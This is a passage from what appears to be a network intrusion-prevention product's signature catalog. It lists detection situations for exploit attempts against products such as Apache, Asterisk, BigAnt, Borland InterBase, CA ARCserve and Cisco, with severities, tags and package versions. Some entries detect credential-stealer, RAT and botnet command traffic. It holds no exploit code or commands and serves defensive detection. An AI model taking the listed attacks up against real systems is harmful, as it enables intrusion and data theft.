Vulnerability: Apache-Spark-Auth-enabled-Standalone-Master-Command-Execution
Description:
Back to top

Generic_CS-Apache-Storm-Gettopologyhistory-Command-Injection

About this situation: An attempt to exploit a vulnerability in Apache Software Foundation Storm detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Apache Storm, CVE2021, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1419-5242
Last changed: sgpkg-ips-1419-5242
Vulnerability: Apache-Storm-Gettopologyhistory-Command-Injection
Description:
Back to top

Generic_CS-Apache-Tomcat-ajp-Local-File-Inclusion

About this situation: An attempt to exploit a vulnerability in Apache Tomcat detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Apache Tomcat, CVE2020, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1233-5242
Last changed: sgpkg-ips-1399-5242
Vulnerability: Apache-Tomcat-ajp-Local-File-Inclusion
Description:
Back to top

Generic_CS-Appian-Enterprise-Business-Suite-DoS

About this situation: An attempt to exploit an Appian Enterprise Business Suite DoS vulnerability detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Appian, CVE2007, Any Operating System not specific, Suspected Denial of Service, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-798-5211
Last changed: sgpkg-ips-800-5242
Vulnerability: Appian-Enterprise-Business-Suite-DoS
Description:
Back to top

Generic_CS-Arkeia-Network-Backup-Server-Buffer-Overflow

About this situation: Attempt to exploit a buffer overflow in Arkeia Network Backup Server
Context: TCP Client Stream Unknown
Severity: 10
Tags: Any Operating System, Any Hardware, Arkeia Network Backup, CVE2005, Any Operating System not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-168-2032
Last changed: sgpkg-ips-325-4219
Vulnerability: Knox-Arkeia-Network-Backup-Server-Type77-Stack-BOF
Description:
Back to top

Generic_CS-Artica-Proxy-Squid.conf-Authentication-Bypass

About this situation: An attempt to exploit a vulnerability in Artica Proxy detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Artica Tech Artica Proxy, CVE2024, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1724-5242
Last changed: sgpkg-ips-1823-5242
Vulnerability: Artica-Proxy-Squid.conf-Authentication-Bypass
Description:
Back to top

Generic_CS-Asterisk-AMI-Originate-Authenticated-RCE

About this situation: An attempt to exploit a vulnerability in Asterisk detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Unix, Any Hardware, Asterisk, CVE2024, Unix not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1806-5242
Last changed: sgpkg-ips-1806-5242
Vulnerability: Asterisk-AMI-Originate-Authenticated-RCE
Description:
Back to top

Generic_CS-Asterisk-Skinny-Channel-Driver-Remote-Denial-of-Service-Vulnerability

About this situation: An attempt to exploit a vulnerability in Asterisk detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Digium Asterisk, CVE2007, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-578-5211
Last changed: sgpkg-ips-578-5211
Vulnerability: Asterisk-Skinny-Channel-Driver-Remote-Denial-of-Service-Vulnerability
Description:
Back to top

Generic_CS-Asterisk-Skinny-Channel-Get-Input-Integer-Overflow

About this situation: Detects buffer overflow exploits against Asterisk
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Digium Asterisk, CVE2006, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-124-2032
Last changed: sgpkg-ips-495-5211
Vulnerability: Asterisk-Skinny-Channel-Get-Input-Integer-Overflow
Description:
Back to top

Generic_CS-Asus-Remote-Console-DPC-Proxy-Server-Buffer-Overflow

About this situation: Asus Remote Console DPC Proxy server 2.0.0.19 and 2.0.0.24 Buffer Overflow
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, DPC Proxy Server, CVE2008, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-648-5211
Last changed: sgpkg-ips-648-5211
Vulnerability: Asus-Remote-Console-DPC-Proxy-Server-Buffer-Overflow
Description:
Back to top

Generic_CS-Atlassian-JIRA-And-Service-Management-Ehcache-Rmi-Insecure-Deserialization

About this situation: An attempt to exploit a vulnerability in Atlassian JIRA and Service Management detected.
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Atlassian JIRA, CVE2020, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1377-5242
Last changed: sgpkg-ips-1377-5242
Vulnerability: Atlassian-JIRA-And-Service-Management-Ehcache-Rmi-Insecure-Deserialization
Description:
Back to top

Generic_CS-Autonomy-Connected-Backup-Type-13-Command-Injection

About this situation: An attempt to exploit a vulnerability in Autonomy Connected Backup detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Autonomy Connected Backup, CVE2011, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-430-4219
Last changed: sgpkg-ips-430-4219
Vulnerability: Autonomy-Connected-Backup-Type-13-Command-Injection
Description:
Back to top

Generic_CS-AveMaria-Stealer-C2-Traffic

About this situation: Avemaria Stealer C2 Traffic was detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Botnet, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1183-5242
Last changed: sgpkg-ips-1382-5242
Vulnerability: AveMaria-Stealer-C2-Traffic
Description:
Back to top

Generic_CS-Avid-Media-Composer-Stack-Based-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Avid Media Composer detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Avid Media Composer, CVE2011, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-656-5211
Last changed: sgpkg-ips-656-5211
Vulnerability: Avid-Media-Composer-Stack-Based-Buffer-Overflow
Description:
Back to top

Generic_CS-B-Labs-Bopup-Communication-Server-Stack-Based-Buffer-Overflow

About this situation: B Labs Bopup Communication Server Stack Based Buffer Overflow
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, B Labs Bopup, CVE2009, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-653-5211
Last changed: sgpkg-ips-653-5211
Vulnerability: B-Labs-Bopup-Communication-Server-Stack-Based-Buffer-Overflow
Description:
Back to top

Generic_CS-B-Labs-Bopup-Communication-Server-Stack-Based-Buffer-Overflow-2

About this situation: B Labs Bopup Communication Server Stack Based Buffer Overflow
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, B Labs Bopup, CVE2009, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1060-5242
Last changed: sgpkg-ips-1338-5242
Vulnerability: B-Labs-Bopup-Communication-Server-Stack-Based-Buffer-Overflow
Description:
Back to top

Generic_CS-Bea-WebLogic-SSL-Handling-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in BEA Systems WebLogic detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, BEA WebLogic, CVE2004, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-436-4219
Vulnerability: Bea-WebLogic-SSL-Handling-Denial-Of-Service
Description:
Back to top

Generic_CS-Berlios-GPSD-Format-String-Vulnerability

About this situation: An attempt to exploit a Berlios GPSD Format String vulnerability detected.
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Berlios GPSD, CVE2004, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-739-5211
Last changed: sgpkg-ips-813-5242
Vulnerability: Berlios-GPSD-Format-String-Vulnerability
Description:
Back to top

Generic_CS-BigAnt-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in BigAnt detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, BigAntSoft BigAnt Server, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-754-5211
Last changed: sgpkg-ips-754-5211
Vulnerability: BigAnt-Buffer-Overflow
Description:
Back to top

Generic_CS-BigAnt-IM-Server-2.2-Buffer-Overflow

About this situation: BigAnt IM Server 2.2 Stack Based Buffer Overflow
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, BigAntSoft BigAnt Server, CVE2008, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-648-5211
Last changed: sgpkg-ips-648-5211
Vulnerability: BigAnt-IM-Server-2.2-Buffer-Overflow
Description:
Back to top

Generic_CS-BigAnt-Server-Ddnf-Request-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in BigAntSoft BigAnt Server detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, BigAntSoft BigAnt Server, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-520-5211
Last changed: sgpkg-ips-520-5211
Vulnerability: BigAnt-Server-Ddnf-Request-Stack-Buffer-Overflow
Description:
Back to top

Generic_CS-BigAnt-Server-Dupf-Command-Arbitrary-File-Upload

About this situation: An attempt to exploit a vulnerability in BigAntSoft BigAnt Server detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, BigAntSoft BigAnt Server, CVE2012, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-520-5211
Last changed: sgpkg-ips-520-5211
Vulnerability: BigAnt-Server-Dupf-Command-Arbitrary-File-Upload
Description:
Back to top

Generic_CS-BigAnt-Server-SCH-Request-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in BigAntSoft BigAnt Server detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, BigAntSoft BigAnt Server, CVE2012, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-514-5211
Last changed: sgpkg-ips-520-5211
Vulnerability: BigAnt-Server-SCH-Request-Stack-Buffer-Overflow
Description:
Back to top

Generic_CS-Blizzard-World-Of-Warcraft-Login

About this situation: Detected login to World of Warcarft online game
Context: TCP Client Stream Unknown
Severity: 2
Tags: Windows, Any Hardware, Blizzard World of Warcraft, Windows not specific, Online Gaming Protocols, TCP Client Traffic
First detected in: sgpkg-ips-138-2032
Last changed: sgpkg-ips-440-4219
Vulnerability: Blizzard-World-Of-Warcraft-Usage
Description:
Back to top

Generic_CS-Blue-Coat-Authentication-Proxy-Buffer-Overflow

About this situation: An attempt to exploit a Blue Coat Authentication Proxy Buffer Overflow vulnerability detected.
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Blue Coat Authentication Proxy, CVE2011, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-713-5211
Last changed: sgpkg-ips-713-5211
Vulnerability: Blue-Coat-Authentication-Proxy-Buffer-Overflow
Description:
Back to top

Generic_CS-Blue-Coat-BCAAA-Stack-Buffer-Overflow

About this situation: A Blue Coat BCAAA Stack Buffer Overflow vulnerability
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Blue Coat BCAAA, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-999-5242
Last changed: sgpkg-ips-1610-5242
Vulnerability: Blue-Coat-BCAAA-Stack-Buffer-Overflow
Description:
Back to top

Generic_CS-Bmc-BladeLogic-Server-Automation-RSCD-Agent-RCE

About this situation: An attempt to exploit a vulnerability in BMC BladeLogic Server Automation detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Linux, Any Hardware, BMC BladeLogic Server Automation, CVE2016, Windows not specific, Linux not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1116-5242
Last changed: sgpkg-ips-1116-5242
Vulnerability: Bmc-BladeLogic-Server-Automation-RSCD-Agent-RCE
Description:
Back to top

Generic_CS-Bmc-Patrol-Agent-Command-Execution

About this situation: An attempt to exploit a vulnerability in BMC Patrol Agent detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Linux, Any Hardware, BMC Patrol Agent, CVE2018, Windows not specific, Linux not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1198-5242
Last changed: sgpkg-ips-1198-5242
Vulnerability: Bmc-Patrol-Agent-Command-Execution
Description:
Back to top

Generic_CS-Bmc-Track-It-Arbitrary-File-Upload

About this situation: An attempt to exploit a Bmc Track-It Arbitrary File Upload vulnerability detected.
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, BMC TrackIt, CVE2014, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-769-5211
Last changed: sgpkg-ips-769-5211
Vulnerability: Bmc-Track-It-Arbitrary-File-Upload
Description:
Back to top

Generic_CS-Borland-Interbase-Database-Message-Handling-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Borland Software InterBase detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Borland Interbase, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-415-4219
Last changed: sgpkg-ips-415-4219
Vulnerability: Borland-Interbase-Database-Message-Handling-Buffer-Overflow
Description:
Back to top

Generic_CS-Borland-Interbase-INET-Connect-Buffer-Overflow

About this situation: Detects attempts to exploit a buffer overflow vulnerability in Borland InterBase INET_connect function
Context: TCP Client Stream Unknown
Severity: 7
Tags: Linux, Any Hardware, Borland Interbase, CVE2007, Linux not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-153-2032
Last changed: sgpkg-ips-153-2032
Vulnerability: Borland-Interbase-Multiple-Remote-Buffer-Overflows
Description:
Back to top

Generic_CS-Borland-Interbase-Isc-Attach-And-Create-Database-Buffer-Overflow

About this situation: Detects attempts to exploit a buffer overflow vulnerability in Borland InterBase
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Borland Interbase, CVE2007, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-153-2032
Last changed: sgpkg-ips-160-2032
Vulnerability: Borland-Interbase-Multiple-Remote-Buffer-Overflows
Borland-Interbase-Open-Marker-File-Buffer-Overflow
Description:
Back to top

Generic_CS-Borland-Interbase-Jrd8-Create-Database-Buffer-Overflow

About this situation: Detects attempts to exploit a buffer overflow vulnerability in Borland InterBase jrd8_create_database function
Context: TCP Client Stream Unknown
Severity: 7
Tags: Linux, Any Hardware, Borland Interbase, CVE2007, Linux not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-153-2032
Last changed: sgpkg-ips-153-2032
Vulnerability: Borland-Interbase-Multiple-Remote-Buffer-Overflows
Description:
Back to top

Generic_CS-Borland-Interbase-SVC-Attach-Buffer-Overflow

About this situation: Detects attempts to exploit a buffer overflow vulnerability in Borland InterBase PWD_db_aliased and SVC_attach functions
Context: TCP Client Stream Unknown
Severity: 7
Tags: Linux, Any Hardware, Borland Interbase, CVE2007, Linux not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-153-2032
Last changed: sgpkg-ips-160-2032
Vulnerability: Borland-Interbase-Multiple-Remote-Buffer-Overflows
Description:
Back to top

Generic_CS-Borland-Software-Interbase-ibserver.exe-Service-Attach-Request-BOF

About this situation: An attempt to exploit a buffer overflow vulnerability in Borland InterBase Server detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Borland Interbase, CVE2008, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-152-2032
Last changed: sgpkg-ips-1060-5242
Vulnerability: Borland-Software-Interbase-ibserver.exe-Service-Attach-Request-BOF
Description:
Back to top

Generic_CS-Botnet-Al3na.weakpatheticfool-Activity

About this situation: Detected botnet al3na.weakpatheticfool activity
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-615-5211
Vulnerability: Al3na.weakpatheticfool-Botnet
Description:
Back to top

Generic_CS-Botnet-Esbot-Activity

About this situation: BotNet Esbot Activity
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-615-5211
Vulnerability: Esbot-Botnet
Description:
Back to top

Generic_CS-Broadwin-WebAccess-Denial-Of-Service

About this situation: Broadwin WebAccess Denial Of Service
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Broadwin WebAccess Server, Windows not specific, Suspected Denial of Service, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-627-5211
Last changed: sgpkg-ips-627-5211
Vulnerability: Broadwin-WebAccess-Denial-Of-Service
Description:
Back to top

Generic_CS-CA-Arcserve-Backup-For-Laptops-And-Desktops-Lgserver-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in CA ARCserve Backup for Laptops and Desktops detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Computer Associates BrightStor ARCserve Backup for Laptops and Desktops, Computer Associates Protection Suite, Computer Associates Desktop Management Suite, CVE2008, Any Operating System not specific, Computer Associates Protection Suite not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-377-4219
Last changed: sgpkg-ips-1780-5242
Vulnerability: CA-Arcserve-Backup-For-Laptops-And-Desktops-Lgserver-Buffer-Overflow
Description:
Back to top

Generic_CS-CA-Arcserve-Backup-For-Windows-BOF

About this situation: Attempt to exploit a buffer overflow vulnerability in Computer Associates ARCserve Backup for Windows
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Computer Associates BrightStor, CVE2005, Windows not specific, Computer Associates BrightStor not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-163-2032
Last changed: sgpkg-ips-625-5211
Vulnerability: BrightStor-Arcserve-Backup-Agent-For-MSSQL-BOF
Description:
Back to top

Generic_CS-CA-BrightStor-Arcserve-Backup-Lgserver-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Computer Associates BrightStor ARCserve Backup for Laptops and Desktops detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Computer Associates BrightStor ARCserve Backup for Laptops and Desktops, CVE2007, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-94-1314
Last changed: sgpkg-ips-485-5211
Vulnerability: CA-BrightStor-Arcserve-Backup-Lgserver-Buffer-Overflow
Description:
Back to top

Generic_CS-CA-BrightStor-HSM-Buffer-Overflow

About this situation: An attempt to exploit a CA BrightStor HSM Buffer Overflow vulnerability detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Computer Associates BrightStor, CVE2007, Windows not specific, Computer Associates BrightStor not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-803-5242
Last changed: sgpkg-ips-803-5242
Vulnerability: CA-BrightStor-HSM-Buffer-Overflow
Description:
Back to top

Generic_CS-CA-eTrust-Intrusion-Detection-Encryption-Key-Handling-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in CA eTrust Intrusion Detection detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Computer Associates eTrust Intrusion Detection, CVE2007, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-564-5211
Last changed: sgpkg-ips-627-5211
Vulnerability: CA-eTrust-Intrusion-Detection-Encryption-Key-Handling-Denial-Of-Service
Description:
Back to top

Generic_CS-CA-Products-Discovery-Service-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in CA BrightStor ARCserve Backup detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Computer Associates BrightStor ARCserve Backup, CVE2006, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-435-4219
Last changed: sgpkg-ips-435-4219
Vulnerability: CA-Products-Discovery-Service-Buffer-Overflow
Description:
Back to top

Generic_CS-CA-Products-Message-Queuing-Server-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in CA Advantage Data Transformer detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, CA Message Queuing, CVE2007, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-362-4219
Last changed: sgpkg-ips-362-4219
Vulnerability: CA-Products-Message-Queuing-Server-Buffer-Overflow
Description:
Back to top

Generic_CS-Certec-atvise-atserver-Denial-of-Service

About this situation: Certec atvise atserver.exe denial of service.
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Certec Atvise, Windows not specific, Suspected Denial of Service, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-628-5211
Last changed: sgpkg-ips-628-5211
Vulnerability: Certec-atvise-atserver-Denial-of-Service
Description:
Back to top

Generic_CS-Cesanta-Mongoose-MQTT-Subscribe-Multiple-Topics-RCE-CVE-2017-2894

About this situation: An attempt to exploit a vulnerability in Cesanta Mongoose
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Cesanta Mongoose, CVE2017, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic, 5th Most Recent Update
First detected in: sgpkg-ips-1867-5242
Last changed: sgpkg-ips-1869-5242
Vulnerability: Cesanta-Mongoose-MQTT-Subscribe-Multiple-Topics-RCE-CVE-2017-2894
Description:
Back to top

Generic_CS-Cesanta-Mongoose-Parse_MQTT-DOS

About this situation: An attempt to exploit a vulnerability in Cesanta Mongoose detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Cesanta Mongoose, CVE2019, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1222-5242
Last changed: sgpkg-ips-1222-5242
Vulnerability: Cesanta-Mongoose-Parse_MQTT-DOS
Description:
Back to top

Generic_CS-Cesanta-Mongoose-Parse_MQTT-Out-Of-Bounds-Read

About this situation: An attempt to exploit a vulnerability in Cesanta Mongoose detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Cesanta Mongoose, CVE2019, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1560-5242
Last changed: sgpkg-ips-1865-5242
Vulnerability: Cesanta-Mongoose-Parse_MQTT-Out-Of-Bounds-Read
Description:
Back to top

Generic_CS-CHAOS-RAT-Infection-Traffic

About this situation: CHAOS RAT infection traffic was detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Botnet, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1358-5242
Last changed: sgpkg-ips-1358-5242
Vulnerability: CHAOS-RAT-Infection-Traffic
Description:
Back to top

Generic_CS-Cisco-CallManager-Malformed-UpdateCapabilities

About this situation: An attempt to exploit a vulnerability in Cisco Callmanager
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Cisco Systems Unified CallManager, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-998-5242
Last changed: sgpkg-ips-998-5242
Description:
Back to top

Generic_CS-Cisco-CNS-Network-Registrar-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Cisco Systems CNS Network Registrar detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Cisco Network Registrar, CVE2004, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-436-4219
Vulnerability: Cisco-CNS-Network-Registrar-Denial-Of-Service
Description:
Back to top

Generic_CS-Cisco-Router-SYNful-Knock-Command

About this situation: A suspicious traffic pattern that resembles a SYNful Knock command was detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Cisco, Any Hardware, Cisco not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-696-5211
Last changed: sgpkg-ips-696-5211
Vulnerability: Cisco-Router-SYNful-Knock
Description:
Back to top

Generic_CS-Cisco-Security-Manager-Rmi-Insecure-Deserialization

About this situation: An attempt to exploit a vulnerability in Cisco Systems Cisco Security Manager (CSM) detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Cisco Systems Cisco Security Manager (CSM), CVE2019, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1200-5242
Last changed: sgpkg-ips-1251-5242
Vulnerability: Cisco-Security-Manager-Rmi-Insecure-Deserialization
Description:
Back to top

Generic_CS-Cisco-Unified-Contact-Center-Express-Rmi-Insecure-Deserialization

About this situation: An attempt to exploit a vulnerability in Cisco Systems Unified Contact Center Express (UCCX) detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Cisco Unified Contact Center Express (UCCX), CVE2020, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1260-5242
Last changed: sgpkg-ips-1260-5242
Vulnerability: Cisco-Unified-Contact-Center-Express-Rmi-Insecure-Deserialization
Description:
Back to top

Generic_CS-CitectSCADA-ODBC-Service-Buffer-Overflow

About this situation: An attempt to exploit a buffer overflow vulnerability in CitecSCADA detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, CitectSCADA, CitectFacilities, CVE2008, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-168-2032
Last changed: sgpkg-ips-610-5211
Vulnerability: CitectSCADA-ODBC-Service-Buffer-Overflow
Description:
Back to top

Generic_CS-Citrix-IMA-Service-Buffer-Overflow

About this situation: An attempt to exploit a buffer overflow vulnerability in Citrix IMA service detected
Context: TCP Client Stream Unknown
Severity: 7
